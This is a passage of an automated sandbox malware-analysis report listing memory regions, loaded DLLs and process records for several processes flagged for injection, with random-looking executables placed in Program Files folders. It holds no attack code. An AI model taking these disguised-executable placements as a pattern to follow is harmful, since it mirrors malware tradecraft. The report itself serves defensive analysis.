Region: id = 2478 start_va = 0xa10000 end_va = 0xa1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a10000" filename = "" Region: id = 2479 start_va = 0xa50000 end_va = 0xa66fff monitored = 0 entry_point = 0xa514a1 region_type = mapped_file name = "drive_law.exe" filename = "\\Program Files (x86)\\Internet Explorer\\drive_law.exe" (normalized: "c:\\program files (x86)\\internet explorer\\drive_law.exe") Region: id = 2480 start_va = 0xa70000 end_va = 0xbf0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a70000" filename = "" Region: id = 2481 start_va = 0xc00000 end_va = 0x1ffffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c00000" filename = "" Region: id = 2482 start_va = 0x21a0000 end_va = 0x21affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021a0000" filename = "" Region: id = 2483 start_va = 0x657b0000 end_va = 0x65829fff monitored = 0 entry_point = 0x657c3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 2484 start_va = 0x65830000 end_va = 0x65837fff monitored = 0 entry_point = 0x658317c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 2485 start_va = 0x65840000 end_va = 0x6588ffff monitored = 0 entry_point = 0x65858180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 2486 start_va = 0x6f190000 end_va = 0x6f1acfff monitored = 0 entry_point = 0x6f193b10 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 2487 start_va = 0x706d0000 end_va = 0x70744fff monitored = 0 entry_point = 0x70709a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 2488 start_va = 0x74570000 end_va = 0x74601fff monitored = 0 entry_point = 0x745b0380 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 2489 start_va = 0x74610000 end_va = 0x74619fff monitored = 0 entry_point = 0x74612a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 2490 start_va = 0x74620000 end_va = 0x7463dfff monitored = 0 entry_point = 0x7462b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 2491 start_va = 0x74650000 end_va = 0x7472ffff monitored = 0 entry_point = 0x74663980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2492 start_va = 0x74730000 end_va = 0x74787fff monitored = 0 entry_point = 0x747725c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 2493 start_va = 0x74790000 end_va = 0x748d6fff monitored = 0 entry_point = 0x747a1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 2494 start_va = 0x748e0000 end_va = 0x7496cfff monitored = 0 entry_point = 0x74929b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 2495 start_va = 0x74b50000 end_va = 0x74bfcfff monitored = 0 entry_point = 0x74b64f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 2496 start_va = 0x754b0000 end_va = 0x7566cfff monitored = 0 entry_point = 0x75592a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 2497 start_va = 0x75680000 end_va = 0x7573dfff monitored = 0 entry_point = 0x756b5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 2498 start_va = 0x75740000 end_va = 0x75783fff monitored = 0 entry_point = 0x75759d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 2499 start_va = 0x758f0000 end_va = 0x75a3efff monitored = 0 entry_point = 0x759a6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 2500 start_va = 0x75e50000 end_va = 0x75e7afff monitored = 0 entry_point = 0x75e55680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 2501 start_va = 0x75e80000 end_va = 0x75ffdfff monitored = 0 entry_point = 0x75f31b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 2502 start_va = 0x76030000 end_va = 0x7614efff monitored = 0 entry_point = 0x76075980 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 2503 start_va = 0x778f0000 end_va = 0x77a6afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 2504 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 2505 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 2506 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2507 start_va = 0x7fff0000 end_va = 0x7ffb28afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 2508 start_va = 0x7ffb28b00000 end_va = 0x7ffb28cc0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2509 start_va = 0x7ffb28cc1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffb28cc1000" filename = "" Thread: id = 289 os_tid = 0x1384 Thread: id = 290 os_tid = 0x1374 Process: id = "75" image_name = "3dftp.exe" filename = "c:\\program files\\windows nt\\3dftp.exe" page_root = "0x1439d000" os_pid = "0x1110" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "11" os_parent_pid = "0x640" cmd_line = "\"C:\\Program Files\\Windows NT\\3dftp.exe\" " cur_dir = "C:\\Program Files\\Windows NT\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f142" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 4523 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 4524 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 4525 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 4526 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 4527 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 4528 start_va = 0xa0000 end_va = 0xa3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000a0000" filename = "" Region: id = 4529 start_va = 0xb0000 end_va = 0xb0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000b0000" filename = "" Region: id = 4530 start_va = 0xc0000 end_va = 0xc1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 4531 start_va = 0x110000 end_va = 0x110fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 4532 start_va = 0x120000 end_va = 0x123fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000120000" filename = "" Region: id = 4533 start_va = 0x140000 end_va = 0x156fff monitored = 0 entry_point = 0x1414a1 region_type = mapped_file name = "3dftp.exe" filename = "\\Program Files\\Windows NT\\3dftp.exe" (normalized: "c:\\program files\\windows nt\\3dftp.exe") Region: id = 4534 start_va = 0x1a0000 end_va = 0x1affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 4535 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 4536 start_va = 0x400000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 4537 start_va = 0x500000 end_va = 0x5bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4538 start_va = 0x5c0000 end_va = 0x67bfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 4539 start_va = 0x690000 end_va = 0x69ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000690000" filename = "" Region: id = 4540 start_va = 0x7b0000 end_va = 0x8affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007b0000" filename = "" Region: id = 4541 start_va = 0x8b0000 end_va = 0xa37fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008b0000" filename = "" Region: id = 4542 start_va = 0xa40000 end_va = 0xbc0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a40000" filename = "" Region: id = 4543 start_va = 0xbd0000 end_va = 0x1fcffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000bd0000" filename = "" Region: id = 4544 start_va = 0x20b0000 end_va = 0x20bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000020b0000" filename = "" Region: id = 4545 start_va = 0x657b0000 end_va = 0x65829fff monitored = 0 entry_point = 0x657c3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 4546 start_va = 0x65830000 end_va = 0x65837fff monitored = 0 entry_point = 0x658317c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 4547 start_va = 0x65840000 end_va = 0x6588ffff monitored = 0 entry_point = 0x65858180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 4548 start_va = 0x6f190000 end_va = 0x6f1acfff monitored = 0 entry_point = 0x6f193b10 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 4549 start_va = 0x706d0000 end_va = 0x70744fff monitored = 0 entry_point = 0x70709a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 4550 start_va = 0x74570000 end_va = 0x74601fff monitored = 0 entry_point = 0x745b0380 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 4551 start_va = 0x74610000 end_va = 0x74619fff monitored = 0 entry_point = 0x74612a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 4552 start_va = 0x74620000 end_va = 0x7463dfff monitored = 0 entry_point = 0x7462b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 4553 start_va = 0x74650000 end_va = 0x7472ffff monitored = 0 entry_point = 0x74663980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 4554 start_va = 0x74730000 end_va = 0x74787fff monitored = 0 entry_point = 0x747725c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 4555 start_va = 0x74790000 end_va = 0x748d6fff monitored = 0 entry_point = 0x747a1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 4556 start_va = 0x74b50000 end_va = 0x74bfcfff monitored = 0 entry_point = 0x74b64f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 4557 start_va = 0x754b0000 end_va = 0x7566cfff monitored = 0 entry_point = 0x75592a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 4558 start_va = 0x75680000 end_va = 0x7573dfff monitored = 0 entry_point = 0x756b5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 4559 start_va = 0x75740000 end_va = 0x75783fff monitored = 0 entry_point = 0x75759d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 4560 start_va = 0x758f0000 end_va = 0x75a3efff monitored = 0 entry_point = 0x759a6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 4561 start_va = 0x75e50000 end_va = 0x75e7afff monitored = 0 entry_point = 0x75e55680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 4562 start_va = 0x75e80000 end_va = 0x75ffdfff monitored = 0 entry_point = 0x75f31b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 4563 start_va = 0x76030000 end_va = 0x7614efff monitored = 0 entry_point = 0x76075980 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 4564 start_va = 0x778f0000 end_va = 0x77a6afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 4565 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 4566 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 4567 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4568 start_va = 0x7fff0000 end_va = 0x7ffb28afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 4569 start_va = 0x7ffb28b00000 end_va = 0x7ffb28cc0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4570 start_va = 0x7ffb28cc1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffb28cc1000" filename = "" Thread: id = 291 os_tid = 0x1290 Thread: id = 292 os_tid = 0x1114 Process: id = "76" image_name = "utg2.exe" filename = "c:\\program files\\windows photo viewer\\utg2.exe" page_root = "0x65e25000" os_pid = "0x1334" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "11" os_parent_pid = "0x640" cmd_line = "\"C:\\Program Files\\Windows Photo Viewer\\utg2.exe\" " cur_dir = "C:\\Program Files\\Windows Photo Viewer\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f142" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 293 os_tid = 0x1348 Thread: id = 294 os_tid = 0x1338 Process: id = "77" image_name = "omnipos.exe" filename = "c:\\program files\\reference assemblies\\omnipos.exe" page_root = "0x5c843000" os_pid = "0x1304" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "11" os_parent_pid = "0x640" cmd_line = "\"C:\\Program Files\\Reference Assemblies\\omnipos.exe\" " cur_dir = "C:\\Program Files\\Reference Assemblies\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f142" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 295 os_tid = 0x1328 Thread: id = 296 os_tid = 0x1308 Process: id = "78" image_name = "nor development rather.exe" filename = "c:\\program files (x86)\\windows nt\\nor development rather.exe" page_root = "0x6b25b000" os_pid = "0x1378" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "11" os_parent_pid = "0x640" cmd_line = "\"C:\\Program Files (x86)\\Windows NT\\nor development rather.exe\" " cur_dir = "C:\\Program Files (x86)\\Windows NT\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f142" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2351 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2352 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2353 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 2354 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 2355 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 2356 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 2357 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 2358 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 2359 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 2360 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 2361 start_va = 0x1e0000 end_va = 0x1e3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 2362 start_va = 0x1f0000 end_va = 0x1f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 2363 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 2364 start_va = 0x440000 end_va = 0x443fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 2365 start_va = 0x450000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 2366 start_va = 0x460000 end_va = 0x51dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2367 start_va = 0x520000 end_va = 0x520fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 2368 start_va = 0x530000 end_va = 0x530fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 2369 start_va = 0x5b0000 end_va = 0x6affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005b0000" filename = "" Region: id = 2370 start_va = 0x7b0000 end_va = 0x937fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007b0000" filename = "" Region: id = 2371 start_va = 0x940000 end_va = 0xac0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000940000" filename = "" Region: id = 2372 start_va = 0xad0000 end_va = 0xb8bfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ad0000" filename = "" Region: id = 2373 start_va = 0xc00000 end_va = 0xc0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c00000" filename = "" Region: id = 2374 start_va = 0xc60000 end_va = 0xc6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c60000" filename = "" Region: id = 2375 start_va = 0x1190000 end_va = 0x11a6fff monitored = 0 entry_point = 0x11914a1 region_type = mapped_file name = "nor development rather.exe" filename = "\\Program Files (x86)\\Windows NT\\nor development rather.exe" (normalized: "c:\\program files (x86)\\windows nt\\nor development rather.exe") Region: id = 2376 start_va = 0x11b0000 end_va = 0x25affff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011b0000" filename = "" Region: id = 2377 start_va = 0x657b0000 end_va = 0x65829fff monitored = 0 entry_point = 0x657c3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 2378 start_va = 0x65830000 end_va = 0x65837fff monitored = 0 entry_point = 0x658317c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 2379 start_va = 0x65840000 end_va = 0x6588ffff monitored = 0 entry_point = 0x65858180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 2380 start_va = 0x6f190000 end_va = 0x6f1acfff monitored = 0 entry_point = 0x6f193b10 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 2381 start_va = 0x706d0000 end_va = 0x70744fff monitored = 0 entry_point = 0x70709a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 2382 start_va = 0x74570000 end_va = 0x74601fff monitored = 0 entry_point = 0x745b0380 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 2383 start_va = 0x74610000 end_va = 0x74619fff monitored = 0 entry_point = 0x74612a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 2384 start_va = 0x74620000 end_va = 0x7463dfff monitored = 0 entry_point = 0x7462b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 2385 start_va = 0x74650000 end_va = 0x7472ffff monitored = 0 entry_point = 0x74663980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2386 start_va = 0x74730000 end_va = 0x74787fff monitored = 0 entry_point = 0x747725c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 2387 start_va = 0x74790000 end_va = 0x748d6fff monitored = 0 entry_point = 0x747a1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 2388 start_va = 0x748e0000 end_va = 0x7496cfff monitored = 0 entry_point = 0x74929b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 2389 start_va = 0x74b50000 end_va = 0x74bfcfff monitored = 0 entry_point = 0x74b64f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 2390 start_va = 0x754b0000 end_va = 0x7566cfff monitored = 0 entry_point = 0x75592a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 2391 start_va = 0x75680000 end_va = 0x7573dfff monitored = 0 entry_point = 0x756b5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 2392 start_va = 0x75740000 end_va = 0x75783fff monitored = 0 entry_point = 0x75759d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 2393 start_va = 0x758f0000 end_va = 0x75a3efff monitored = 0 entry_point = 0x759a6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 2394 start_va 